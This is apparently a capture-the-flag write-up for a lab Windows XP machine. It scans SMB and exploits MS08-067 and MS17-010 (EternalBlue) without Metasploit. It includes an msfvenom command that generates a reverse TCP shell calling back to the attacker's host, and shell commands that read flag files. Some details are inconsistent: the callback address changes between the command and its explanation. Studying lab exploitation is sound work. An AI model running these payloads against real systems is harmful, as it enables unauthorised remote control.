Nmap shows just remote desktop (3389), and the SMB/NetBios ports (TCP 139, 445 and UDP 137) Our initial recon shows that the only point of entry is possibly through exploiting SMB.
Enumeration:
SMB: Null Auth
Neither smbmap nor smbclient show any ability to log in without authentication:
SMB has had its fair share of vulnerabilities in the past, so let’s first run nmap scripts to determine if it is vulnerable. I can see a list of these scripts by looking at the files in the nmap scripts directory:
┌──(kali㉿kali)-[~]
└─$ ls /usr/share/nmap/scripts/ | grep smb | grep vuln
┌──(kali㉿kali)-[~]
└─$ nmap -v -script smb-vuln* -p 139,445 10.10.10.4
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
| smb-vuln-ms08-067:
| VULNERABLE:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| State: VULNERABLE
| IDs: CVE:CVE-2008-4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
|
| Disclosure date: 2008-10-23
| References:
| https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
The result shows us that it is vulnerable to CVE-2009–3103 and CVE-2017–0143 and likely vulnerable to CVE-2008–4250. The target machine is running SMBv1 so we’ll go with CVE-2017–0143 (MS17–010). It looks like this box is vulnerable to two infamous SMB exploits, MS-08-067 (made famous by Conficker) and MS-17-010 (made famous by Shadow Brokers).
System Shell:
Both of these vulnerabilities give a shell as system. Both also have Metasploit modules that are basically automatic pwns. But to make this interesting (and relevant to anyone doing PWK / OSCP), I’ll show how to do each without Metasploit.
MS-08-067
//Locate Exploit
I’ll use the exploit from jivoi on Github here. It’s a python script that requires Impacket (which comes installed on Kali) and for me to replace the default shellcode with some of my own. (Interestingly, the default is a reverse TCP shell to 10.11.0.157… looks like the author may have been in PWK.)
//Shellcode Generation
To make the shellcode, I’ll use msfvenom. I’ll copy the bad characters list (-b) from the examples in the exploit code. I’ll use the following parameters:
┌──(kali㉿kali)-[~]
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.8 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f py -v shellcode -a x86 --platform windows
-p windows/shell_reverse_tcp - This will connect back to me with a shell. Because I used shell_reverse_tcp it is unstaged, meaning the entire shell is in this code, and I can catch the callback with nc. Had I used shell/reverse_tcp, that would be a staged payload, and I’d need to use Metasploits exploit/multi/handler to get the callback.
LHOST=10.10.14.14 LPORT=443 EXITFUNC=thread - defining the variables for the payload - my ip, the port, and how to exit.
-b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" - The bad characters not to use. I got this from the comments in the python code.
-f py - Output in python format. The examples use c format, and just pasted it in slightly differently. Either will work.
-v shellcode - Have the code set the variable shellcode, instead of the default, buf. I want this to match what it’s called in the code I’m using.
-a x86 and --platform windows - Describing the environment I’m attacking.
I’ll take this shellcode into the script, and paste it in replacing the default. I like to also paste in a comment above it with the msfvenom command string I ran to generate it so that when I come back to it someday, I’ll know what it’s doing.
//Guess Version
The exploit requires that I know the version of Windows and the Language pack:
//Run Exploit
I’ll open a nc listener, and run the exploit:
Whoami doesn’t seem to work and we can’t echo the username. Therefore, we’ll have to get creative. Kali has a whoami executable that we can import to our target machine.
Both netcat and powershell are not installed on the target machine, so we can’t use them to import the executable. Therefore, let’s try and setup an SMB server for the transfer.
C:\WINDOWS\system32>cd \
C:\>dir user.txt /s
Directory of C:\Documents and Settings\john\Desktop
C:\>cd \Documents and Settings\john\Desktop
C:\Documents and Settings\john\Desktop>type user.txt
FIND ROOT.TXT
C:\Documents and Settings\john\Desktop>cd \
C:\>dir root.txt /s
Directory of C:\Documents and Settings\Administrator\Desktop
C:\>cd \Documents and Settings\Administrator\Desktop
C:\Documents and Settings\Administrator\Desktop>type root.txt
MS-17-010:
//Locate Exploit
There’s a few GitHubs out there with MS-17-010 code, but not as many that work on XP. My favorite is a fork of worawit’s MS17-010 repo by helviojunior. He added a send_and_execute.py, which I can give an executable and it will upload and run it.
The vulnerability we’ll be exploiting is called Eternal Blue. This vulnerability exploited Microsoft’s implementation of the Server Message Block (SMB) protocol, where if an attacker sent a specially crafted packet, the attacker would be allowed to execute arbitrary code on the target machine.
I came across this article that explains how to exploit the Eternal Blue vulnerability without using Metasploit. We’ll use it to run the exploit on the target machine.
